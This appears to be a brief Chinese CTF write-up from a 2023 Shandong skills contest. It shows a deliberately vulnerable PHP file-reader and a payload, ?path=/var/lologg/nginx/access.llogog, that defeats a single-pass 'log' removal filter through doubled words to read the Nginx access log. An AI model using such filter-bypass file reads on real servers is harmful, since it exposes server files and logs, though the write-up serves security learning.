2023 技能兴鲁“信息创大赛” 学生组日志里的Flag

日志里的FLAG：

提示说在日志里面，访问网页探测为Nginx服务器，读nginx对应的日志：
分析服务器为Nginx 读取对应日志位置
上代码：

<?php
highlight_file(__FILE__);
print("FLAG就存在于日志文件里哦！");
if (isset($_GET['path'])) {
    $path = $_GET['path'];
    if (preg_match('/flag|\$|["\']/i', $path)) {
        echo "错误";
    } else {
        $path = str_replace("log","", $path);
        var_dump($path);
        if (file_exists($path)) {
            $content = file_get_contents($path);
            echo highlight_string($content, true);
        } else {
            echo "文件不存在";
        }
    }
} else {
    echo "请提供文件路径";
}
FLAG就存在于日志文件里哦！请提供文件路径

$path = str_replace("log","", $path);替换,使用双写进行绕过

/var/lologg/nginx/access.llogog

Payload

?path=/var/lologg/nginx/access.llogog‘

网络安全

2023 技能兴鲁“信息创大赛” 学生组日志里的Flag

https://chrrr1y.github.io/2023/11/16/2023技能兴鲁/

作者

Chrrr1y

发布于

2023年11月16日

更新于

2023年11月16日

许可协议

PHP escapeshellarg和escapeshellcmd漏洞上一篇

使用微信推送课程消息下一篇

2023 技能兴鲁“信息创大赛” 学生组 日志里的Flag

日志里的FLAG：

Payload

2023 技能兴鲁“信息创大赛” 学生组日志里的Flag